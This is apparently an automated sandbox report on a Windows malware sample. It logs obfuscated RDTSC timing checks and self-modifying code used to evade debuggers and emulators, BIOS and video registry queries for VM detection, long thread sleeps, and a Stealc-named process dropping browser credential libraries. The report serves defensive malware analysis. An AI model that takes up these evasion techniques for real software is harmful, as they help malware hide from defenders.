Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 518006B second address: 5180071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180071 second address: 5180079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180079 second address: 51800E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and esp, FFFFFFF8h 0x0000000a jmp 00007F8D1541FE13h 0x0000000f xchg eax, ecx 0x00000010 pushad 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007F8D1541FE0Fh 0x0000001e pop esi 0x0000001f pushfd 0x00000020 jmp 00007F8D1541FE19h 0x00000025 or eax, 6290B206h 0x0000002b jmp 00007F8D1541FE11h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51800E3 second address: 518013C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D15422251h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F8D1542224Eh 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F8D15422250h 0x00000015 push eax 0x00000016 jmp 00007F8D1542224Bh 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F8D15422255h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 518013C second address: 51801AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D1541FE17h 0x00000008 pushfd 0x00000009 jmp 00007F8D1541FE18h 0x0000000e adc ax, 12F8h 0x00000013 jmp 00007F8D1541FE0Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebx, dword ptr [ebp+10h] 0x0000001f jmp 00007F8D1541FE16h 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F8D1541FE0Ah 0x0000002e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51801AB second address: 51801B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51801B1 second address: 51801E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, 1136D859h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F8D1541FE0Fh 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 mov al, 70h 0x00000017 popad 0x00000018 mov esi, dword ptr [ebp+08h] 0x0000001b jmp 00007F8D1541FE0Ah 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51801E7 second address: 51801ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51801ED second address: 518023D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov edx, 0128A392h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F8D1541FE15h 0x00000017 pop ecx 0x00000018 pushfd 0x00000019 jmp 00007F8D1541FE11h 0x0000001e sbb ah, 00000016h 0x00000021 jmp 00007F8D1541FE11h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 518023D second address: 5180243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180243 second address: 5180252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180252 second address: 5180256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180256 second address: 518025A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 518025A second address: 5180260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180260 second address: 5180288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bl, E1h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test esi, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8D1541FE18h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180288 second address: 518028E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 518028E second address: 518035D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F8D1541FE18h 0x0000000b adc ah, 00000028h 0x0000000e jmp 00007F8D1541FE0Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F8D871BE15Dh 0x0000001d pushad 0x0000001e mov cl, 91h 0x00000020 call 00007F8D1541FE11h 0x00000025 mov di, cx 0x00000028 pop eax 0x00000029 popad 0x0000002a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000031 jmp 00007F8D1541FE13h 0x00000036 je 00007F8D871BE13Ah 0x0000003c pushad 0x0000003d mov ax, AF0Bh 0x00000041 push esi 0x00000042 pushfd 0x00000043 jmp 00007F8D1541FE17h 0x00000048 add ecx, 4FE3C12Eh 0x0000004e jmp 00007F8D1541FE19h 0x00000053 popfd 0x00000054 pop eax 0x00000055 popad 0x00000056 mov edx, dword ptr [esi+44h] 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F8D1541FE19h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 518035D second address: 5180363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180363 second address: 51803EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D1541FE0Ah 0x00000008 call 00007F8D1541FE12h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 push edx 0x0000001a mov edi, esi 0x0000001c pop ecx 0x0000001d popad 0x0000001e test edx, 61000000h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F8D1541FE18h 0x0000002d and cx, CDC8h 0x00000032 jmp 00007F8D1541FE0Bh 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F8D1541FE18h 0x0000003e or cl, 00000028h 0x00000041 jmp 00007F8D1541FE0Bh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51803EF second address: 51803F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51803F5 second address: 518040F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F8D871BE091h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8D1541FE0Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 518040F second address: 5180421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D1542224Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180421 second address: 5180472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8D1541FE0Dh 0x00000013 xor ecx, 1AF689A6h 0x00000019 jmp 00007F8D1541FE11h 0x0000001e popfd 0x0000001f mov cx, 10D7h 0x00000023 popad 0x00000024 jne 00007F8D871BE04Eh 0x0000002a jmp 00007F8D1541FE0Ah 0x0000002f test bl, 00000007h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180472 second address: 5180476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180476 second address: 518047C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 517073D second address: 5170743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170743 second address: 5170760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8D1541FE10h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170760 second address: 517076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1542224Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 517076F second address: 5170775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170775 second address: 5170779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170779 second address: 51707BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F8D1541FE17h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F8D1541FE16h 0x00000015 and esp, FFFFFFF8h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51707BA second address: 51707C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51707C0 second address: 517080E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 mov dl, al 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b jmp 00007F8D1541FE16h 0x00000010 mov dword ptr [esp], ebx 0x00000013 jmp 00007F8D1541FE10h 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8D1541FE17h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 517080E second address: 5170840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D1542224Fh 0x00000008 push esi 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dl, cl 0x00000013 call 00007F8D15422253h 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170840 second address: 5170846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170846 second address: 5170891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D15422250h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F8D15422250h 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 jmp 00007F8D15422250h 0x00000019 sub ebx, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F8D1542224Ah 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170891 second address: 5170896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170896 second address: 51708E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F8D1542224Dh 0x0000000b add esi, 686647B6h 0x00000011 jmp 00007F8D15422251h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test esi, esi 0x0000001c pushad 0x0000001d jmp 00007F8D1542224Ch 0x00000022 popad 0x00000023 je 00007F8D871C7D00h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51708E0 second address: 51708E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51708E4 second address: 51708FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D15422254h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51708FC second address: 517095C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov bx, 7350h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000013 jmp 00007F8D1541FE0Fh 0x00000018 mov ecx, esi 0x0000001a pushad 0x0000001b mov dx, 8BD6h 0x0000001f popad 0x00000020 je 00007F8D871C5883h 0x00000026 jmp 00007F8D1541FE0Dh 0x0000002b test byte ptr [76FA6968h], 00000002h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F8D1541FE18h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 517095C second address: 517096B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1542224Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 517096B second address: 51709BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F8D871C5834h 0x0000000f pushad 0x00000010 call 00007F8D1541FE0Ch 0x00000015 mov bx, si 0x00000018 pop ecx 0x00000019 pushad 0x0000001a mov edx, 1CA62CD0h 0x0000001f mov esi, ebx 0x00000021 popad 0x00000022 popad 0x00000023 mov edx, dword ptr [ebp+0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F8D1541FE0Eh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51709BC second address: 51709CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D1542224Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51709CE second address: 51709D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51709D2 second address: 51709F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8D15422253h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51709F0 second address: 51709F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Special instruction interceptor: First address: 9BD460 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Special instruction interceptor: First address: 9E1615 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Special instruction interceptor: First address: A466D3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 37D460 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 3A1615 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 4066D3 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory allocated: 1550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory allocated: 2FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Memory allocated: 15B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory allocated: 2380000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory allocated: 2580000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory allocated: 4580000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Memory allocated: AB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Memory allocated: 2590000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Memory allocated: 4590000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Memory allocated: 16D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Memory allocated: 30C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Memory allocated: 16D0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\OmnqazpM3P.exe

Code function: 0_2_051F0C59 rdtsc

0_2_051F0C59

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\1000238002\Amadeus.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 180000

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1126	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1413	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 876	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1498	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1482	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2189	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 4781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Window / User API: threadDelayed 508
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Window / User API: threadDelayed 1257

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zSC5C3.tmp\Install.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSD38E.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	API coverage: 0.0 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API coverage: 9.8 %

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5384	Thread sleep time: -130065s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5560	Thread sleep time: -2253126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4444	Thread sleep time: -5250000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6720	Thread sleep time: -2827413s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6456	Thread sleep time: -1752876s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5304	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5628	Thread sleep time: -2997498s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2472	Thread sleep time: -2965482s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe TID: 4744	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3440	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4072	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe TID: 6728	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe TID: 1708	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe TID: 3040	Thread sleep time: -4611686018427385s >= -30000s
